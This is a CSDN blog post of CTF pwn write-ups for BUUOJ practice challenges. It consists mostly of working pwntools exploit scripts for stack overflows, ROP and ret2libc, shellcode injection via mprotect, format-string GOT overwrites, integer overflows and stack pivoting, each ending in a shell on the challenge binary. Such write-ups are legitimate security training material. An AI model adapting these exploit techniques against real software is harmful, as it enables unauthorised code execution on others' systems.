buuoj pwn

最新推荐文章于 2022-05-22 12:56:23 发布
最新推荐文章于 2022-05-22 12:56:23 发布
阅读量1k 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45262739/article/details/108955261
版权
本文记录了一系列CTF比赛中的漏洞利用技术,包括栈溢出、rop、gdb调试、格式字符串漏洞、整数溢出等。通过实例详细解释了如何利用这些漏洞执行任意代码,如ret2text、ret2libc、ret2syscall等,并展示了不同场景下的payload构造技巧。此外,还涉及到了shellcode注入和堆栈迁移等高级技术。
摘要由CSDN通过智能技术生成

文章目录

ret2text

rip

pwntools gdb 调试

gdb.debug(’./xxx’)

pause()

在弹出窗口设好断点,用 python 传递不可打印字符

堆栈平衡,简单溢出

from pwn import *
#context.log_level='debug'
#p=remote('node3.buuoj.cn',27864)
#p=gdb.debug('./pwn1')

#pause()
target_addr=0x401186
ret_addr=0x401016
pay='a'*(0xf+8)+p64(ret_addr)+p64(target_addr)
p.sendline(pay)
#pause()
p.interactive()

warmup_csaw_2016

简单溢出

from pwn import *
p=process('./warmup_csaw_2016')

sys_addr=0x40060d
pay='a'*(0x40+8)+p64(sys_addr)
p.sendline(pay)
p.interactive()

pwn1_sctf_2016

程序会将 I 替换成 you

用 I 构造一定长度的 payload 溢出

from pwn import *
p=process('./pwn1_sctf_2016')

#p=gdb.debug('./pwn1_sctf_2016')
get_flag_addr=0x8048F0D
#pause()
pay='I'*((0x3c+4)/3)+'a'*((0x3c+4)%3)+p32(get_flag_addr)
p.sendline(pay)
p.interactive()

ciscn_2019_n_1

简单覆盖

小数的二进制表示

from pwn import *
p=process('./ciscn_2019_n_1')

pay='1'*(0x30-4)+p64(0x41348000)
p.recvuntil('guess the number.\n')
p.sendline(pay)
p.interactive()

baby_rop

简单的 rop

from pwn import *
p=process('./baby_rop')

rdi_addr=0x400683
sys_addr=0x400490
sh_addr=0x601048

pay='a'*(0x10+8)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr)
p.recvuntil("What's your name?")
p.sendline(pay)
p.interactive()

level2 & level2_x64

简单的 rop

from pwn import *
p=process('./level2')

sh_addr=0x804A024
sys_addr=0x8048320
pay='a'*(0x88+4)+p32(sys_addr)+p32(0)+p32(sh_addr)

p.recvuntil('Input:')
p.sendline(pay)
p.interactive()

from pwn import *
p=process('./level2_x64')

sys_addr=0x4004c0
sh_addr=0x600a90
rdi_addr=0x4006b3

pay='a'*(0x80+8)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr)
p.recvuntil('Input:')
p.sendline(pay)
p.interactive()

bjdctf_2020_babystack

简单 rop

from pwn import *
p=process('./bjdctf_2020_babystack')

backdoor=0x4006E6
pay='a'*(0x10+8)+p64(backdoor)
p.recvuntil('[+]Please input the length of your name:')
p.sendline('100')
p.recvuntil("[+]What's u name?")
p.sendline(pay)
p.interactive()

ciscn_2019_ne_5

from pwn import *
#p=process('./ciscn_2019_ne_5')
p=remote('node3.buuoj.cn',27369)
#p=gdb.debug('./ciscn_2019_ne_5')

sh_addr=0x80482ea
sys_addr=0x80484d0
pay='a'*(0x48+4)+p32(sys_addr)+'aaaa'+p32(sh_addr)

p.recvuntil('Please input admin password:')
p.sendline('administrator')
p.recvuntil('0.Exit')
p.sendline('1')
p.recvuntil('Please input new log info:')
#pause()
p.sendline(pay)

p.recvuntil('0.Exit')
p.sendline('4')
p.interactive()

ret2syscall

one_gadget

用 one_gadget 找到 exec ,用给出的 printf@plt 算出基址

from pwn import *
#p=process('./one_gadget')
p=remote('node3.buuoj.cn',28384)
libc=ELF('./libc-2.29.so')

one_gadget_addr=[0xe237f,0xe2383,0xe2386,0x106ef8]
p.recvuntil('0x')
printf_addr=int(p.recv(12),16)
print hex(printf_addr)
libcbase=printf_addr-libc.symbols['printf']
pay=libcbase+one_gadget_addr[3]

sleep(0.5)
p.sendline(str(pay))
p.interactive()

ret2libc

ciscn_2019_c_1

栈溢出泄漏基址,一波 LibcSearcher 冲冲冲

from pwn import *
from LibcSearcher import *
#context.log_level='debug'
#p=process('./ciscn_2019_c_1')
p=remote('node3.buuoj.cn',26505)

elf=ELF('./ciscn_2019_c_1')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']

main_addr=0x400B28
rdi_addr=0x400c83
ret_addr=0x4006b9
pay='a'*(0x50+8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

p.recvuntil('Input your choice!\n')
p.sendline('1')
p.recvuntil('Input your Plaintext to be encrypted\n')
p.sendline(pay)

p.recvuntil('Ciphertext\n')
p.recvuntil('\n')
puts_addr=u64(p.recv(6)+'\x00\x00')

print hex(puts_addr)
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')

sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')
pay='a'*(0x50+8)+p64(ret_addr)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr)

p.recvuntil('Input your choice!\n')
p.sendline('1')
p.recvuntil('Input your Plaintext to be encrypted\n')
p.sendline(pay)

p.interactive()

ciscn_2019_n_5

堆栈平衡 ret

from pwn import *
from LibcSearcher import *
#context.log_level='debug'
#p=process('./ciscn_2019_n_5')
p=remote('node3.buuoj.cn',28418)
elf=ELF('./ciscn_2019_n_5')

rdi_addr=0x400713
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=0x400636
ret_addr=0x4004c9

pay='a'*(0x20+8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.recvuntil('tell me your name')
p.sendline('a')
p.recvuntil('What do you want to say to me?\n')
p.sendline(pay)
puts_addr=u64(p.recv(6)+'\x00\x00')
print hex(puts_addr)

libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')
sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')

pay='a'*(0x20+8)+p64(ret_addr)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr)
p.recvuntil('tell me your name')
p.sendline('a')
p.recvuntil('What do you want to say to me?\n')
p.sendline(pay)
p.interactive()

bjdctf_2020_babyrop

from pwn import *
from LibcSearcher import *
context.log_level='debug'
p=remote('node3.buuoj.cn',28920)
elf=ELF('./bjdctf_2020_babyrop')

main_addr=0x4006AD
rdi_addr=0x400733
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']

pay='a'*(0x20+8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.recvuntil('Pull up your sword and tell me u story!\n')
p.sendline(pay)
puts_addr=u64(p.recv(6)+'\x00\x00')
print(hex(puts_addr))

libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')
sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')

pay='a'*(0x20+8)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr)
p.recvuntil('Pull up your sword and tell me u story!\n')
p.sendline(pay)
p.interactive()

babyrop

很好的一道题,有多种溢出方法

read 函数读取到 \n

strlen 从 \x00 截断

构造以 \x00 开头的 pay 可以绕过 strcpyn 函数

用输入足够长的 buf 覆盖 v6 使下一个函数中的 buf 可以栈溢出

libc.so 需要基址

leak by puts

#leak by puts 
elf=ELF('./pwn')

puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main_addr=0x8048825

pay='\x00'+'\xff'*(0x2c-0x25) #use buf to cover v6 to make the length enough
p.sendline(pay)

p.recvuntil('Correct\n')
pay1='a'*(0xe7+4)+p32(puts_plt)+p32(main_addr)+p32(puts_got)
p.sendline(pay1)
puts_addr=u32(p.recv(4))
print hex(puts_addr)

libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')
sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')

pay1='a'*(0xe7+4)+p32(sys_addr)+p32(1)+p32(sh_addr)
p.sendline(pay)
p.recvuntil('Correct\n')
p.sendline(pay1)
p.interactive()

leak by write

#leak by write
elf=ELF('./pwn')
#libc=ELF('./libc-2.23.so')

write_got=elf.got['write']
write_plt=elf.plt['write']
main_addr=0x8048825

pay='\x00'+'\xff'*(0x2c-0x25) #use buf to cover v6 to make the length enough
p.sendline(pay)

p.recvuntil('Correct\n')
pay1='a'*(0xe7+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(pay1)
write_addr=u32(p.recv(4))
print hex(write_addr)

libc=LibcSearcher('write',write_addr)
libcbase=write_addr-libc.dump('write')
sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')

pay1='a'*(0xe7+4)+p32(sys_addr)+p32(1)+p32(sh_addr)
p.sendline(pay)
p.recvuntil('Correct\n')
p.sendline(pay1)
p.interactive()

leak by libc.so

from pwn import *
from LibcSearcher import *
#p=process('./pwn')
p=remote('node3.buuoj.cn',26060)
#arch 32

# leak by libc.so
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')

pay='\x00'+'\xff'*(0x2c-0x25)
p.sendline(pay)
p.recvuntil('Correct\n')

write_got=elf.got['write']
write_plt=elf.plt['write']
main_addr=0x8048825
sys_addr=libc.symbols['system']
sh_addr=libc.search('/bin/sh').next()

pay1='a'*(0xe7+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(pay1)
write_addr=u32(p.recv(4))
libcbase=write_addr-libc.symbols['write']

sys_addr+=libcbase
sh_addr+=libcbase
pay1='a'*(0xe7+4)+p32(sys_addr)+p32(1)+p32(sh_addr)

p.sendline(pay)
p.recvuntil('Correct\n')
p.sendline(pay1)
p.interactive()

babyrop2

from pwn import *
from LibcSearcher import *
#context.log_level='debug'
#p=process('./babyrop2')
p=remote('node3.buuoj.cn',28182)
elf=ELF('./babyrop2')

main_addr=0x400636
rdi_addr=0x400733
rsi_addr=0x400731
ret_addr=0x4004d1
format=0x400770
read_got=elf.got['read']
printf_plt=elf.plt['printf']

pay='a'*(0x20+8)+p64(rdi_addr)+p64(format)+p64(rsi_addr)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_addr)

p.recvuntil('your name?')
p.sendline(pay)
p.recvuntil('Welcome to the Pwn World again, ')
p.recvuntil('Welcome to the Pwn World again, ')

read_addr=u64(p.recv(6)+'\x00\x00')
print hex(read_addr)
libc=LibcSearcher('read',read_addr)
libcbase=read_addr-libc.dump('read')

sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')
pay='a'*(0x20+8)+p64(rdi_addr)+p64(sh_addr)+p64(sys_addr)+'aaa'

p.recvuntil('your name?')
p.sendline(pay)
p.interactive()

pwn2_sctf_2016

integer overflow

from pwn import *
from LibcSearcher import *
#context.log_level='debug'
#p=process('./pwn2_sctf_2016')
p=remote('node3.buuoj.cn',29029)
elf=ELF('./pwn2_sctf_2016')
#p=gdb.debug('./pwn2_sctf_2016')

ret_addr=0x8048346
format_addr=0x80486F8
printf_got=elf.got['printf']
printf_plt=elf.plt['printf']
pop2_addr=0x804864e
main_addr=0x80485B8

pay='a'*(0x2c+4)+p32(printf_plt)+p32(pop2_addr)+p32(format_addr)+p32(printf_got)+p32(main_addr)
p.recvuntil('How many bytes do you want me to read?')
p.sendline('-1')
p.recvuntil('bytes of data!')
p.sendline(pay)

p.recvuntil('You said: ')
p.recvuntil('You said: ')
printf_addr=u32(p.recv(4))
print hex(printf_addr)

libc=LibcSearcher('printf',printf_addr)
libcbase=printf_addr-libc.dump('printf')
sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')

pay='a'*(0x2c+4)+p32(sys_addr)+'a'*4+p32(sh_addr)
p.recvuntil('How many bytes do you want me to read?')
p.sendline('-1')
p.recvuntil('bytes of data!')
p.sendline(pay)
p.interactive()

2018_rop

from pwn import *
from LibcSearcher import *
context.log_level='debug'
p=remote('node3.buuoj.cn',29515)
#p=process('./2018_rop')
elf=ELF('./2018_rop')

main_addr=0x80484C6
write_plt=elf.plt['write']
write_got=elf.got['write']
pop3_addr=0x804855d

pay='a'*(0x88+4)+p32(write_plt)+p32(pop3_addr)+p32(1)+p32(write_got)+p32(4)+p32(main_addr)
p.sendline(pay)
#p.recvuntil('Hello, World\n')
write_addr=u32(p.recv(4))
print hex(write_addr)

libc=LibcSearcher('write',write_addr)
libcbase=write_addr-libc.dump('write')
sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')

pay='a'*(0x88+4)+p32(sys_addr)+'aaaa'+p32(sh_addr)
p.sendline(pay)
p.interactive()

ret2shellcode

get_started_3dsctf_2016 & not_the_same_3dsctf_2016

mprotect

直接溢出到 get_flag 会在读取文件的时候莫名错误

mprotect 给 bss(似乎必须是 0x1000 的整数倍,页对齐?)加权限

get_started_3dsctf_2016

int mprotect(const void *start, size_t len, int prot);
//参数start表示开始的内存地址,len是要操作的内存大小,prot表示权限 0x7全给

x86 的多函数 payload 模板

offset+p32(func1_addr)+p32(pop1)+p32(para_for_func1)
+p32(func1_addr)+p32(pop2)+p32(para_for_func2)

from pwn import *
p=process('./get_started_3dsctf_2016')
elf=ELF('./get_started_3dsctf_2016')
#p=gdb.debug('./get_started_3dsctf_2016')
#pause()

mprotect_addr=0x806EC80
bss_addr=0x80e9000
read_addr=elf.symbols['read']
pop3_addr=0x80483b8

pay='a'*0x38+p32(mprotect_addr)+p32(pop3_addr)
pay+=p32(bss_addr)+p32(0x200)+p32(0x7)
pay+=p32(read_addr)+p32(bss_addr)+p32(0)+p32(bss_addr)+p32(0x200)

p.sendline(pay)
sleep(0.2)

pay=asm(shellcraft.sh())
p.sendline(pay)
p.interactive()

not_the_same_3dsctf_2016

from pwn import *
#p=remote('node3.buuoj.cn',26569)
p=process('./not_the_same_3dsctf_2016')
elf=ELF('./not_the_same_3dsctf_2016')
#p=gdb.debug('./not_the_same_3dsctf_2016')
#pause()

mprotect_addr=0x806ED40
read_addr=0x806E200
bss_addr=0x80ec000
pop3_addr=0x809e3e5

pay='a'*(45)+p32(mprotect_addr)+p32(pop3_addr)+p32(bss_addr)+p32(0x200)+p32(7)
pay+=p32(read_addr)+p32(bss_addr)+p32(0)+p32(bss_addr)+p32(0x200)
#p.recvuntil('b0r4')
sleep(0.5)
p.sendline(pay)
sleep(0.5)
p.sendline(asm(shellcraft.sh()))
p.interactive()

get_secret 将 flag 写入 bss 段,可以用 write 函数将 bss 写出

mprotect_addr=0x806ED40
read_addr=0x806E200
bss_addr=0x80ec000
pop3_addr=0x809e3e5

pay='a'*(45)+p32(mprotect_addr)+p32(pop3_addr)+p32(bss_addr)+p32(0x200)+p32(7)
pay+=p32(read_addr)+p32(bss_addr)+p32(0)+p32(bss_addr)+p32(0x200)
#p.recvuntil('b0r4')
sleep(0.5)
p.sendline(pay)
sleep(0.5)
p.sendline(asm(shellcraft.sh()))
p.interactive()

ez_pz_hackover_2016

from pwn import *
#p=process('./ez_pz_hackover_2016')
p=remote('node3.buuoj.cn',25618)
#p=gdb.debug('./ez_pz_hackover_2016')
elf=ELF('./ez_pz_hackover_2016')

p.recvuntil('Yippie, lets crash: 0x')
s_addr=int((p.recv(8)),16)
print(hex(s_addr))
pay='crashme\x00\x00'+'a'*17+p32(s_addr-0x1c)+asm(shellcraft.sh())
#pay+='a'*(0x32-len(pay)+4)+p32(s_addr)

p.sendline(pay)
p.interactive()

format string vuln

pwn5

格式化字符漏洞,姿势众多

覆盖判断变量,绕过判断

from pwn import *
p=process('./pwn5')

target_addr=0x804C044
offset=10

pay=fmtstr_payload(offset,{target_addr:0x11111111})
p.recvuntil('name:')
p.sendline(pay)
p.recvuntil('passwd:')
p.sendline(str(0x11111111))
p.interactive()

把 atoi 的 got 表改成 system() 读入 /bin/sh 劫持函数

from pwn import *
p=process('./pwn5')
elf=ELF('./pwn5')

atoi_addr=elf.got['atoi']
sys_addr=elf.symbols['system']
offset=10

pay=fmtstr_payload(offset,{atoi_addr:sys_addr})
p.recvuntil('name:')
p.sendline(pay)
p.recvuntil('passwd:')
p.sendline('/bin/sh\x00')
p.interactive()

覆盖 read atoi printf puts 的 got 表劫持程序流程

from pwn import *
p=process('./pwn5')
#p=gdb.debug('./pwn5')
elf=ELF('./pwn5')

printf_addr=elf.got['printf']
read_addr=elf.got['read']
#puts_addr=elf.got['puts']
atoi_addr=elf.got['atoi']
sys_addr=0x804931A#bypass judgment
offset=10

pay=fmtstr_payload(offset,{read_addr:sys_addr})
p.recvuntil('name:')
p.sendline(pay)
p.recvuntil('passwd:')
p.sendline(str(0x11111111))
p.interactive()
#leaking by puts is not available,maybe something is wrong

integer overflow

r2t3

长度变量 v3 为 unsign int8,超过 0xff 溢出,所以可以用长度为 0x104~0x108 的字符串整形溢出

strlen 和 strcpy 都存在 \x00 截断,不能用 \x00 绕过长度验证

from pwn import *
p=process('./r2t3')

sh_addr=0x804858B
pay='a'*(0x11+4)+p32(sh_addr)+'a'*(0x104-0x11-4-4)
p.recvuntil('Please input your name:')
p.sendline(pay)
p.interactive()

ciscn_n_8

_QWORD 为 4 个字节

from pwn import *
p=process('./ciscn_2019_n_8')

pay='a'*(13*4)+p64(17)
p.recvuntil('name?')
p.sendline(pay)
p.interactive()

stack migration

ciscn_2019_es_2

migrate to stack

from pwn import *
#p=gdb.debug('./ciscn_2019_es_2')
#p=process('./ciscn_2019_es_2')
p=remote('node3.buuoj.cn',28334)

sys_addr=0x8048400
leave_ret=0x80484b8
pay='a'*0x28
p.sendafter("Welcome, my friend. What's your name?\n",pay)

p.recvuntil('a'*0x28)
ebp_addr=u32(p.recv(4))
print hex(ebp_addr)

pay=('a'*4+p32(sys_addr)+'b'*4+p32(ebp_addr-0x28)+'/bin/sh\x00').ljust(0x28,'p')+p32(ebp_addr-0x38)+p32(leave_ret)
#pay=('a'*8+p32(ebp_addr-0x24)+'b'*4+p32(sys_addr)+'c'*4+p32(ebp_addr-0x1c)+'/bin/sh\x00').ljust(0x28,'p')+p32(ebp_addr-0x2c)#+p32(leave_ret)
#perfectly use function main's leave
sleep(0.2)
p.sendline(pay)
p.interactive()

spwn

migrate to .bss

from pwn import *
from LibcSearcher import *
#context.log_level='debug'
#p=gdb.debug('./spwn')
#p=process('./spwn')
p=remote('node3.buuoj.cn',28086)
elf=ELF('./spwn')

s_addr=0x804A300
leave_ret=0x8048408
write_plt=elf.plt['write']
write_got=elf.got['write']
pop3_addr=0x80485a9
ret_addr=0x8048312
main_addr=0x8048513

pay='a'*4+p32(write_plt)+p32(pop3_addr)+p32(1)+p32(write_got)+p32(4)+p32(main_addr)
p.recvuntil('What is your name?')
p.sendline(pay)
pay='a'*(0x18)+p32(s_addr)+p32(leave_ret)
p.recvuntil('What do you want to say?')
p.send(pay)

#sleep(0.5)
write_addr=u32(p.recv(4))
print hex(write_addr)
libc=LibcSearcher('write',write_addr)
libcbase=write_addr-libc.dump('write')
sys_addr=libcbase+libc.dump('system')
sh_addr=libcbase+libc.dump('str_bin_sh')

pay='a'*4+p32(sys_addr)+'a'*4+p32(sh_addr)#+p32(main_addr)
p.recvuntil('What is your name?')
p.sendline(pay)
pay='a'*(0x18)+p32(s_addr)+p32(leave_ret)
p.recvuntil('What do you want to say?')
p.sendline(pay)
p.interactive()

other

[BJDCTF 2nd]test

ssh 使用和 system 的特殊使用

  • test.c在if 判断这块过滤了很多命令,取下的过滤规则是 “n|e|p|b|u|s|h|i|f|l|a|g”,可以使用下面命令,查看剩余可以使用的命令
  • ls /usr/bin/ /bin/ | grep -v -E "n|e|p|b|u|s|h|i|f|l|a|g"
from pwn import *
shell=ssh('ctf','node3.buuoj.cn',password='test',port=29706)
p=shell.run('sh')
p.sendline('./test')
sleep(0.2)

p.sendline('x86_64')
p.sendline('cat flag')
p.interactive()
疯疯芸
关注
专栏目录
buuoj--sqlilabs
weixin_30270815的博客
03-21 807
CTF欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑
BUUOJ PWN [ZJCTF 2019]Login
weixin_50287973的博客
11-18 371
输入这些断了下来 是在call rax那断了下来,追踪一下rax [rbp+var_130]的地址作为参数传入User::read_password(void),rax的值赋给了[rbp+var_130] 在password_checker()看看rax怎么来的 这样的话控制[rbp+var_18]为Admin::shell地址就可以了 输入password覆盖到[rbp+var_18] 0x60-0x18=72=14+58 由于_snprintf函数,写入的不含一定0字符的password格式
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 549
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 677
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这题多多少少有点问题。 IDA里面是这样的,但是exp一直有问题,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
Buuoj Pwn
VisualNull的博客
05-22 284
babyrop WP 一道比较简单的ret2libc 考察点为strlen函数遇到\x00返回 但是有一个坑 IDA逆向拿到伪代码 main函数 逻辑是程序开始运行时读入一个随机数 然后传给并调用sub_804871F函数 sub_804871F函数 a1为main函数传入的随机数(buff) 格式化后将a1给了s 之后从终端读入数据给buf 然后将数组buf的某个元素变为0(这是一个坑) 之后获取buf的长度(strlen函数) 这里是第一个利用..
buuoj Pwn writeup 116-120
yongbaoii的博客
05-11 260
116 roarctf_2019_realloc_magic 117 [BJDCTF 2nd]rci 118 wustctf2020_number_game 119 picoctf_2018_are you root 120 [GKCTF2020]Domo
BUUOJ PWN 61-80
2h4ox1n9
12-17 260
61\
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1330
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
CTF-Pwn-[BJDCTF 2nd]rci
01-09
https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]rci 下载rci文件 思路 老规矩使用file和checksec查看文件 全保! 程序可以执行两次system,第一次执行的时候在sh的工作目录位于/tmp下一个随机的文件夹,用 ...
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5295
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
BUUOj PWN 121-140
2h4ox1n9
12-17 135
121、ciscn_2019_final_5 122、picoctf_2018_are you root 123、[BJDCTF 2nd]diff 124、bjdctf_2020_YDSneedGrirlfriend 125、judgement_mna_2016 126、gyctf_2020_document 127、护网杯_2018_gettingstart 128、xman_2019_format
buuoj-Pwn-刷题记录
Do1phln的博客
10-30 316
warmup_csaw_2016 题目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开题目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 330
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 332
271 espcially_tu_2016 就是一个栈溢出。 但是这个题最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问题还是ios_c99scanf的问题,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会刷新缓冲区的指针。 那如果放的是gets 跑程序的时
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 403
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 286
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
BUU PWN(一)
playmaker的博客
01-28 2152
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
BUUOJ
zbbjya的博客
01-04 112
点击我们会看到网址栏哪里有一个/?file=flag.php 说明flag就在PHP的文件当中而现在我们没有看见flag 我们可以用、 页面跳转 变化了 然后你就会得到这样的数据 这样就会得到flag了
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 431
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值